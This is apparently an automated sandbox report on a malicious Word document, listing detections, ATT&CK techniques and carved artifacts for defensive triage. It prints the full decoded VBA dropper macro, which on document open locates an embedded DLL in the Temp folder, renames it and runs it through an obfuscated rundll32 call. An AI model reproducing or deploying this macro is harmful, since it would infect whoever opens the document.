MALICIOUS
550
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute upon opening, and it attempts to download and execute a second-stage payload named 'kikus.dll' using the reconstructed command 'run2l32'. This payload is likely malicious, as indicated by the ClamAV detection of 'Doc.Downloader.Jrat-6336393-1' and the embedded PE executable.
Heuristics 14
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
Reference to WinExec API high SC_STR_WINEXECReference to WinExec API
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set vbvcx = CreateObject("Scripting.FileSystemObject") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2719 bytes |
SHA-256: b63fa2303f27e014e38c8c1471933c1dbb661e0d8d57af7ef2b73e4c07a34a03 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Private Declare PtrSafe Function gc Lib "shell32" _
Alias "ShellExecuteA" (ByVal hwnd As Long, _
ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
Dim bbbb As String
Dim cx
cx = wdUserTemplatesPath
bbbb = "run" & "dl"
vcbc = Options.DefaultFilePath(cx)
If Dir(vcbc & "\kikus.dll") = "" Then
Call yyy
If Len(hdv) > 2 Then
Call nam(hdv)
Dim cvzz As String
cvzz = "l3" & "2"
gc 0, vbNullString, _
bbbb & cvzz, vcbc & "\kikus.dll,OFCBWXTHRNL", _
vbNullString, 1
End If
End If
End Sub
Sub hdhdd(asda As String)
Dim vbvcx As Object
Set vbvcx = CreateObject("Scripting.FileSystemObject")
Call Search(vbvcx.GetFolder(asda), hdv)
End Sub
Sub yyy()
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.TypeBackspace
Selection.Copy
Call bvxfcsd
End Sub
Attribute VB_Name = "Module1"
Dim pls As String
Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = ".dll"
Name pafs As pls & "\kikus" & oxl
End Sub
Sub uoia(fffs As String)
pls = fffs
End Sub
Sub Search(mds As Object, pafs As String)
Dim Nedc As Object
For Each Nedc In mds.SubFolders
Search Nedc, pafs
Next Nedc
Dim Ters As Object
For Each Ters In mds.Files
If Ters.Name = "kiks.dll" Then
pafs = Ters
End If
Next Ters
Exit Sub
ErrHandle:
Err.Clear
End Sub
Attribute VB_Name = "Module2"
Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub
Attribute VB_Name = "Module3"
Sub bvxfcsd()
Dim dfbvc As String
dfbvc = "al" & "\Te"
Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"
ntgs = 50
sda = 49
While sda < 50
ntgs = ntgs - 1
If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
Else
sda = 61
End If
Wend
Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub
|
|||
embedded_office_0008fa71.exe |
embedded-pe | Office MZ+PE at offset 0x8FA71 | 778127 bytes |
SHA-256: 585f61d3c26262ce479abfcdc027005438853fa86a376f61cc828e96f8090e14 |
|||
|
Detection
ClamAV:
Win.Packed.Midie-10008727-0
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1685932759/Ole10Native | 738613 bytes |
SHA-256: 9c63ba26b4524d8584f51e0f07bfaa8d53a1620179af4f4f696a009994169fbe |
|||
ole10native_00_kiks.dll |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1685932759/Ole10Native; display_name=kiks.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\kiks.dll; temp_path=; def_file= | 738304 bytes |
SHA-256: 50c79e0302806fba97663b7d6d9d2bb6640e4eec395adb7f49ca777e9e81e15e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.